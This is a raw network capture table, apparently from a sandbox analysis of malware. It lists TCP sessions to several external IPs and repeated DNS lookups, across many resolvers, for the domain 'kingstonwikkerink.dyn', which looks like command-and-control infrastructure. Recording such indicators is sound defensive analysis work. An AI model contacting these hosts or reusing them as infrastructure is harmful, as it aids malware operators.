                                                                                                            Nov 1, 2024 08:48:32.936131954 CET75845097281.29.149.178192.168.2.14
                                                                                                            Nov 1, 2024 08:48:32.936152935 CET75845097281.29.149.178192.168.2.14
                                                                                                            Nov 1, 2024 08:48:32.936250925 CET509727584192.168.2.1481.29.149.178
                                                                                                            Nov 1, 2024 08:48:32.936250925 CET509727584192.168.2.1481.29.149.178
                                                                                                            Nov 1, 2024 08:48:32.936285019 CET509727584192.168.2.1481.29.149.178
                                                                                                            Nov 1, 2024 08:48:48.048932076 CET4110610513192.168.2.1491.149.218.232
                                                                                                            Nov 1, 2024 08:48:48.053774118 CET105134110691.149.218.232192.168.2.14
                                                                                                            Nov 1, 2024 08:48:48.053828001 CET4110610513192.168.2.1491.149.218.232
                                                                                                            Nov 1, 2024 08:48:48.053873062 CET4110610513192.168.2.1491.149.218.232
                                                                                                            Nov 1, 2024 08:48:48.058828115 CET105134110691.149.218.232192.168.2.14
                                                                                                            Nov 1, 2024 08:48:48.058870077 CET4110610513192.168.2.1491.149.218.232
                                                                                                            Nov 1, 2024 08:48:48.063767910 CET105134110691.149.218.232192.168.2.14
                                                                                                            Nov 1, 2024 08:48:49.031445026 CET105134110691.149.218.232192.168.2.14
                                                                                                            Nov 1, 2024 08:48:49.031508923 CET105134110691.149.218.232192.168.2.14
                                                                                                            Nov 1, 2024 08:48:49.031683922 CET105134110691.149.218.232192.168.2.14
                                                                                                            Nov 1, 2024 08:48:49.031805038 CET4110610513192.168.2.1491.149.218.232
                                                                                                            Nov 1, 2024 08:48:49.031805038 CET4110610513192.168.2.1491.149.218.232
                                                                                                            Nov 1, 2024 08:48:49.031805038 CET4110610513192.168.2.1491.149.218.232
                                                                                                            Nov 1, 2024 08:48:49.031805038 CET4110610513192.168.2.1491.149.218.232
                                                                                                            Nov 1, 2024 08:48:54.045610905 CET5888012035192.168.2.1481.29.149.178
                                                                                                            Nov 1, 2024 08:48:54.050432920 CET120355888081.29.149.178192.168.2.14
                                                                                                            Nov 1, 2024 08:48:54.050523996 CET5888012035192.168.2.1481.29.149.178
                                                                                                            Nov 1, 2024 08:48:54.050523996 CET5888012035192.168.2.1481.29.149.178
                                                                                                            Nov 1, 2024 08:48:54.055440903 CET120355888081.29.149.178192.168.2.14
                                                                                                            Nov 1, 2024 08:48:54.055506945 CET5888012035192.168.2.1481.29.149.178
                                                                                                            Nov 1, 2024 08:48:54.060316086 CET120355888081.29.149.178192.168.2.14
                                                                                                            Nov 1, 2024 08:48:55.074847937 CET120355888081.29.149.178192.168.2.14
                                                                                                            Nov 1, 2024 08:48:55.075118065 CET5888012035192.168.2.1481.29.149.178
                                                                                                            Nov 1, 2024 08:48:55.075118065 CET5888012035192.168.2.1481.29.149.178
                                                                                                            Nov 1, 2024 08:48:55.075139046 CET120355888081.29.149.178192.168.2.14
                                                                                                            Nov 1, 2024 08:48:55.075207949 CET5888012035192.168.2.1481.29.149.178
                                                                                                            Nov 1, 2024 08:48:55.075406075 CET120355888081.29.149.178192.168.2.14
                                                                                                            Nov 1, 2024 08:48:55.075465918 CET5888012035192.168.2.1481.29.149.178
                                                                                                            Nov 1, 2024 08:49:05.101026058 CET348945136192.168.2.1431.13.248.89
                                                                                                            Nov 1, 2024 08:49:05.105943918 CET51363489431.13.248.89192.168.2.14
                                                                                                            Nov 1, 2024 08:49:05.106030941 CET348945136192.168.2.1431.13.248.89
                                                                                                            Nov 1, 2024 08:49:05.106095076 CET348945136192.168.2.1431.13.248.89
                                                                                                            Nov 1, 2024 08:49:05.111083031 CET51363489431.13.248.89192.168.2.14
                                                                                                            Nov 1, 2024 08:49:05.111145973 CET348945136192.168.2.1431.13.248.89
                                                                                                            Nov 1, 2024 08:49:05.115997076 CET51363489431.13.248.89192.168.2.14
                                                                                                            Nov 1, 2024 08:49:06.238045931 CET51363489431.13.248.89192.168.2.14
                                                                                                            Nov 1, 2024 08:49:06.238415956 CET348945136192.168.2.1431.13.248.89
                                                                                                            Nov 1, 2024 08:49:06.238521099 CET348945136192.168.2.1431.13.248.89
                                                                                                            Nov 1, 2024 08:49:11.252090931 CET604367427192.168.2.1431.13.248.89
                                                                                                            Nov 1, 2024 08:49:11.256985903 CET74276043631.13.248.89192.168.2.14
                                                                                                            Nov 1, 2024 08:49:11.257076979 CET604367427192.168.2.1431.13.248.89
                                                                                                            Nov 1, 2024 08:49:11.257105112 CET604367427192.168.2.1431.13.248.89
                                                                                                            Nov 1, 2024 08:49:11.262049913 CET74276043631.13.248.89192.168.2.14
                                                                                                            Nov 1, 2024 08:49:11.262145996 CET604367427192.168.2.1431.13.248.89
                                                                                                            Nov 1, 2024 08:49:11.267011881 CET74276043631.13.248.89192.168.2.14
                                                                                                            Nov 1, 2024 08:49:12.344821930 CET74276043631.13.248.89192.168.2.14
                                                                                                            Nov 1, 2024 08:49:12.344965935 CET604367427192.168.2.1431.13.248.89
                                                                                                            Nov 1, 2024 08:49:12.345046043 CET604367427192.168.2.1431.13.248.89
                                                                                                            Nov 1, 2024 08:49:37.372873068 CET604387427192.168.2.1431.13.248.89
                                                                                                            Nov 1, 2024 08:49:37.377846956 CET74276043831.13.248.89192.168.2.14
                                                                                                            Nov 1, 2024 08:49:37.377928019 CET604387427192.168.2.1431.13.248.89
                                                                                                            Nov 1, 2024 08:49:37.377948999 CET604387427192.168.2.1431.13.248.89
                                                                                                            Nov 1, 2024 08:49:37.383047104 CET74276043831.13.248.89192.168.2.14
                                                                                                            Nov 1, 2024 08:49:37.383100986 CET604387427192.168.2.1431.13.248.89
                                                                                                            Nov 1, 2024 08:49:37.388037920 CET74276043831.13.248.89192.168.2.14
                                                                                                            Nov 1, 2024 08:49:38.462037086 CET74276043831.13.248.89192.168.2.14
                                                                                                            Nov 1, 2024 08:49:38.462111950 CET74276043831.13.248.89192.168.2.14
                                                                                                            Nov 1, 2024 08:49:38.462116957 CET74276043831.13.248.89192.168.2.14
                                                                                                            Nov 1, 2024 08:49:38.462326050 CET74276043831.13.248.89192.168.2.14
                                                                                                            Nov 1, 2024 08:49:38.462347984 CET604387427192.168.2.1431.13.248.89
                                                                                                            Nov 1, 2024 08:49:38.462347984 CET604387427192.168.2.1431.13.248.89
                                                                                                            Nov 1, 2024 08:49:38.462414980 CET604387427192.168.2.1431.13.248.89
                                                                                                            Nov 1, 2024 08:49:38.462414980 CET604387427192.168.2.1431.13.248.89
                                                                                                            Nov 1, 2024 08:49:38.462414980 CET604387427192.168.2.1431.13.248.89
                                                                                                            Nov 1, 2024 08:49:48.704472065 CET5458410635192.168.2.14217.28.130.41
                                                                                                            Nov 1, 2024 08:49:48.709321976 CET1063554584217.28.130.41192.168.2.14
                                                                                                            Nov 1, 2024 08:49:48.709402084 CET5458410635192.168.2.14217.28.130.41
                                                                                                            Nov 1, 2024 08:49:48.709439993 CET5458410635192.168.2.14217.28.130.41
                                                                                                            Nov 1, 2024 08:49:48.714240074 CET1063554584217.28.130.41192.168.2.14
                                                                                                            Nov 1, 2024 08:49:48.714287996 CET5458410635192.168.2.14217.28.130.41
                                                                                                            Nov 1, 2024 08:49:48.719269037 CET1063554584217.28.130.41192.168.2.14
                                                                                                            Nov 1, 2024 08:49:49.402734041 CET1063554584217.28.130.41192.168.2.14
                                                                                                            Nov 1, 2024 08:49:49.402750015 CET1063554584217.28.130.41192.168.2.14
                                                                                                            Nov 1, 2024 08:49:49.402895927 CET5458410635192.168.2.14217.28.130.41
                                                                                                            Nov 1, 2024 08:49:49.402895927 CET5458410635192.168.2.14217.28.130.41
                                                                                                            Nov 1, 2024 08:49:49.402895927 CET5458410635192.168.2.14217.28.130.41
                                                                                                            Nov 1, 2024 08:49:54.495878935 CET540363207192.168.2.14213.182.204.57
                                                                                                            Nov 1, 2024 08:49:54.500706911 CET320754036213.182.204.57192.168.2.14
                                                                                                            Nov 1, 2024 08:49:54.500807047 CET540363207192.168.2.14213.182.204.57
                                                                                                            Nov 1, 2024 08:49:54.500819921 CET540363207192.168.2.14213.182.204.57
                                                                                                            Nov 1, 2024 08:49:54.505564928 CET320754036213.182.204.57192.168.2.14
                                                                                                            Nov 1, 2024 08:49:54.505672932 CET540363207192.168.2.14213.182.204.57
                                                                                                            Nov 1, 2024 08:49:54.510593891 CET320754036213.182.204.57192.168.2.14
                                                                                                            Nov 1, 2024 08:49:55.466566086 CET320754036213.182.204.57192.168.2.14
                                                                                                            Nov 1, 2024 08:49:55.466753960 CET540363207192.168.2.14213.182.204.57
                                                                                                            Nov 1, 2024 08:49:55.466810942 CET540363207192.168.2.14213.182.204.57
                                                                                                            Nov 1, 2024 08:49:55.466856003 CET320754036213.182.204.57192.168.2.14
                                                                                                            Nov 1, 2024 08:49:55.466984987 CET540363207192.168.2.14213.182.204.57
                                                                                                            Nov 1, 2024 08:49:55.467006922 CET320754036213.182.204.57192.168.2.14
                                                                                                            Nov 1, 2024 08:49:55.467061043 CET540363207192.168.2.14213.182.204.57
                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Nov 1, 2024 08:47:58.511673927 CET5332553192.168.2.1464.176.6.48
                                                                                                            Nov 1, 2024 08:47:58.603015900 CET4355053192.168.2.1464.176.6.48
                                                                                                            Nov 1, 2024 08:48:03.518136978 CET6010653192.168.2.14202.61.197.122
                                                                                                            Nov 1, 2024 08:48:03.528585911 CET5360106202.61.197.122192.168.2.14
                                                                                                            Nov 1, 2024 08:48:03.609112978 CET4480953192.168.2.14202.61.197.122
                                                                                                            Nov 1, 2024 08:48:03.619434118 CET5344809202.61.197.122192.168.2.14
                                                                                                            Nov 1, 2024 08:48:03.620590925 CET3463753192.168.2.14152.53.15.127
                                                                                                            Nov 1, 2024 08:48:03.630863905 CET5334637152.53.15.127192.168.2.14
                                                                                                            Nov 1, 2024 08:48:04.391918898 CET3633053192.168.2.141.1.1.1
                                                                                                            Nov 1, 2024 08:48:04.391982079 CET4415653192.168.2.141.1.1.1
                                                                                                            Nov 1, 2024 08:48:04.398830891 CET53441561.1.1.1192.168.2.14
                                                                                                            Nov 1, 2024 08:48:04.398926020 CET53363301.1.1.1192.168.2.14
                                                                                                            Nov 1, 2024 08:48:09.476969004 CET3528253192.168.2.14178.254.22.166
                                                                                                            Nov 1, 2024 08:48:14.483072996 CET5698753192.168.2.1480.152.203.134
                                                                                                            Nov 1, 2024 08:48:14.530381918 CET535698780.152.203.134192.168.2.14
                                                                                                            Nov 1, 2024 08:48:21.196084976 CET3685453192.168.2.145.161.109.23
                                                                                                            Nov 1, 2024 08:48:26.201951027 CET4632153192.168.2.14194.36.144.87
                                                                                                            Nov 1, 2024 08:48:26.211889029 CET5346321194.36.144.87192.168.2.14
                                                                                                            Nov 1, 2024 08:48:31.902369976 CET6017053192.168.2.14202.61.197.122
                                                                                                            Nov 1, 2024 08:48:31.914482117 CET5360170202.61.197.122192.168.2.14
                                                                                                            Nov 1, 2024 08:48:37.938775063 CET5321753192.168.2.145.161.109.23
                                                                                                            Nov 1, 2024 08:48:42.945354939 CET4927053192.168.2.14178.254.22.166
                                                                                                            Nov 1, 2024 08:48:47.952069044 CET4441953192.168.2.14168.235.111.72
                                                                                                            Nov 1, 2024 08:48:48.047791958 CET5344419168.235.111.72192.168.2.14
                                                                                                            Nov 1, 2024 08:48:54.034728050 CET5747053192.168.2.14202.61.197.122
                                                                                                            Nov 1, 2024 08:48:54.044996023 CET5357470202.61.197.122192.168.2.14
                                                                                                            Nov 1, 2024 08:49:00.078269005 CET3356353192.168.2.14137.220.52.23
                                                                                                            Nov 1, 2024 08:49:05.084858894 CET4980653192.168.2.1451.158.108.203
                                                                                                            Nov 1, 2024 08:49:05.100255013 CET534980651.158.108.203192.168.2.14
                                                                                                            Nov 1, 2024 08:49:11.240998983 CET4472853192.168.2.14202.61.197.122
                                                                                                            Nov 1, 2024 08:49:11.251439095 CET5344728202.61.197.122192.168.2.14
                                                                                                            Nov 1, 2024 08:49:17.347718954 CET3350853192.168.2.145.161.109.23
                                                                                                            Nov 1, 2024 08:49:22.354116917 CET6014553192.168.2.14137.220.52.23
                                                                                                            Nov 1, 2024 08:49:27.360928059 CET3798153192.168.2.14137.220.52.23
                                                                                                            Nov 1, 2024 08:49:32.367155075 CET4459753192.168.2.145.161.109.23
                                                                                                            Nov 1, 2024 08:49:43.464896917 CET4782353192.168.2.145.161.109.23
                                                                                                            Nov 1, 2024 08:49:48.471343040 CET3472653192.168.2.14217.160.70.42
                                                                                                            Nov 1, 2024 08:49:48.703790903 CET5334726217.160.70.42192.168.2.14
                                                                                                            Nov 1, 2024 08:49:54.405348063 CET4858553192.168.2.14168.235.111.72
                                                                                                            Nov 1, 2024 08:49:54.494941950 CET5348585168.235.111.72192.168.2.14
                                                                                                            Nov 1, 2024 08:50:00.469556093 CET4823653192.168.2.145.161.109.23
                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                            Nov 1, 2024 08:47:58.511673927 CET192.168.2.1464.176.6.480x91fbStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:48:03.518136978 CET192.168.2.14202.61.197.1220xcf6eStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:48:04.391918898 CET192.168.2.141.1.1.10xba55Standard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:48:04.391982079 CET192.168.2.141.1.1.10x2344Standard query (0)daisy.ubuntu.com28IN (0x0001)false
                                                                                                            Nov 1, 2024 08:48:09.476969004 CET192.168.2.14178.254.22.1660xb0fcStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:48:14.483072996 CET192.168.2.1480.152.203.1340x12edStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:48:21.196084976 CET192.168.2.145.161.109.230x7365Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:48:26.201951027 CET192.168.2.14194.36.144.870xdaf4Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:48:31.902369976 CET192.168.2.14202.61.197.1220xb545Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:48:37.938775063 CET192.168.2.145.161.109.230xb539Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:48:42.945354939 CET192.168.2.14178.254.22.1660xd9d5Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:48:47.952069044 CET192.168.2.14168.235.111.720x785fStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:48:54.034728050 CET192.168.2.14202.61.197.1220x6ef3Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:49:00.078269005 CET192.168.2.14137.220.52.230x914dStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:49:05.084858894 CET192.168.2.1451.158.108.2030xb9a0Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:49:11.240998983 CET192.168.2.14202.61.197.1220xb4eeStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:49:17.347718954 CET192.168.2.145.161.109.230x354aStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:49:22.354116917 CET192.168.2.14137.220.52.230x26c0Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:49:27.360928059 CET192.168.2.14137.220.52.230xa506Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:49:32.367155075 CET192.168.2.145.161.109.230x5140Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:49:43.464896917 CET192.168.2.145.161.109.230xb6ecStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:49:48.471343040 CET192.168.2.14217.160.70.420x4aa4Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:49:54.405348063 CET192.168.2.14168.235.111.720xba02Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:50:00.469556093 CET192.168.2.145.161.109.230xa273Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                            Nov 1, 2024 08:48:03.528585911 CET202.61.197.122192.168.2.140xcf6eNo error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:48:03.528585911 CET202.61.197.122192.168.2.140xcf6eNo error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:48:03.528585911 CET202.61.197.122192.168.2.140xcf6eNo error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:48:03.528585911 CET202.61.197.122192.168.2.140xcf6eNo error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:48:03.528585911 CET202.61.197.122192.168.2.140xcf6eNo error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:48:03.528585911 CET202.61.197.122192.168.2.140xcf6eNo error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:48:03.528585911 CET202.61.197.122192.168.2.140xcf6eNo error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:48:03.528585911 CET202.61.197.122192.168.2.140xcf6eNo error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:48:03.528585911 CET202.61.197.122192.168.2.140xcf6eNo error (0)kingstonwikkerink.dyn217.28.130.41A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:48:03.619434118 CET202.61.197.122192.168.2.140xcf6eFormat error (1)kingstonwikkerink.dynnonenoneA (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:48:04.398926020 CET1.1.1.1192.168.2.140xba55No error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:48:04.398926020 CET1.1.1.1192.168.2.140xba55No error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:48:14.530381918 CET80.152.203.134192.168.2.140x12edNo error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:48:14.530381918 CET80.152.203.134192.168.2.140x12edNo error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:48:14.530381918 CET80.152.203.134192.168.2.140x12edNo error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:48:14.530381918 CET80.152.203.134192.168.2.140x12edNo error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:48:14.530381918 CET80.152.203.134192.168.2.140x12edNo error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:48:14.530381918 CET80.152.203.134192.168.2.140x12edNo error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:48:14.530381918 CET80.152.203.134192.168.2.140x12edNo error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:48:14.530381918 CET80.152.203.134192.168.2.140x12edNo error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:48:14.530381918 CET80.152.203.134192.168.2.140x12edNo error (0)kingstonwikkerink.dyn217.28.130.41A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:48:26.211889029 CET194.36.144.87192.168.2.140xdaf4No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:48:26.211889029 CET194.36.144.87192.168.2.140xdaf4No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:48:26.211889029 CET194.36.144.87192.168.2.140xdaf4No error (0)kingstonwikkerink.dyn217.28.130.41A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:48:26.211889029 CET194.36.144.87192.168.2.140xdaf4No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:48:26.211889029 CET194.36.144.87192.168.2.140xdaf4No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:48:26.211889029 CET194.36.144.87192.168.2.140xdaf4No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:48:26.211889029 CET194.36.144.87192.168.2.140xdaf4No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:48:26.211889029 CET194.36.144.87192.168.2.140xdaf4No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:48:26.211889029 CET194.36.144.87192.168.2.140xdaf4No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:48:31.914482117 CET202.61.197.122192.168.2.140xb545No error (0)kingstonwikkerink.dyn217.28.130.41A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:48:31.914482117 CET202.61.197.122192.168.2.140xb545No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:48:31.914482117 CET202.61.197.122192.168.2.140xb545No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:48:31.914482117 CET202.61.197.122192.168.2.140xb545No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:48:31.914482117 CET202.61.197.122192.168.2.140xb545No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:48:31.914482117 CET202.61.197.122192.168.2.140xb545No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:48:31.914482117 CET202.61.197.122192.168.2.140xb545No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:48:31.914482117 CET202.61.197.122192.168.2.140xb545No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:48:31.914482117 CET202.61.197.122192.168.2.140xb545No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:48:48.047791958 CET168.235.111.72192.168.2.140x785fNo error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:48:48.047791958 CET168.235.111.72192.168.2.140x785fNo error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:48:48.047791958 CET168.235.111.72192.168.2.140x785fNo error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:48:48.047791958 CET168.235.111.72192.168.2.140x785fNo error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:48:48.047791958 CET168.235.111.72192.168.2.140x785fNo error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:48:48.047791958 CET168.235.111.72192.168.2.140x785fNo error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:48:48.047791958 CET168.235.111.72192.168.2.140x785fNo error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:48:48.047791958 CET168.235.111.72192.168.2.140x785fNo error (0)kingstonwikkerink.dyn217.28.130.41A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:48:48.047791958 CET168.235.111.72192.168.2.140x785fNo error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:48:54.044996023 CET202.61.197.122192.168.2.140x6ef3No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:48:54.044996023 CET202.61.197.122192.168.2.140x6ef3No error (0)kingstonwikkerink.dyn217.28.130.41A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:48:54.044996023 CET202.61.197.122192.168.2.140x6ef3No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:48:54.044996023 CET202.61.197.122192.168.2.140x6ef3No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:48:54.044996023 CET202.61.197.122192.168.2.140x6ef3No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:48:54.044996023 CET202.61.197.122192.168.2.140x6ef3No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:48:54.044996023 CET202.61.197.122192.168.2.140x6ef3No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:48:54.044996023 CET202.61.197.122192.168.2.140x6ef3No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:48:54.044996023 CET202.61.197.122192.168.2.140x6ef3No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:49:05.100255013 CET51.158.108.203192.168.2.140xb9a0No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:49:05.100255013 CET51.158.108.203192.168.2.140xb9a0No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:49:05.100255013 CET51.158.108.203192.168.2.140xb9a0No error (0)kingstonwikkerink.dyn217.28.130.41A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:49:05.100255013 CET51.158.108.203192.168.2.140xb9a0No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:49:05.100255013 CET51.158.108.203192.168.2.140xb9a0No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:49:05.100255013 CET51.158.108.203192.168.2.140xb9a0No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:49:05.100255013 CET51.158.108.203192.168.2.140xb9a0No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:49:05.100255013 CET51.158.108.203192.168.2.140xb9a0No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:49:05.100255013 CET51.158.108.203192.168.2.140xb9a0No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:49:11.251439095 CET202.61.197.122192.168.2.140xb4eeNo error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:49:11.251439095 CET202.61.197.122192.168.2.140xb4eeNo error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:49:11.251439095 CET202.61.197.122192.168.2.140xb4eeNo error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:49:11.251439095 CET202.61.197.122192.168.2.140xb4eeNo error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:49:11.251439095 CET202.61.197.122192.168.2.140xb4eeNo error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:49:11.251439095 CET202.61.197.122192.168.2.140xb4eeNo error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                                                            Nov 1, 2024 08:49:11.251439095 CET202.61.197.122192.168.2.140xb4eeNo error (0)kingstonwikkerink.dyn217.28.130.41A (IP address)IN (0x0001)false
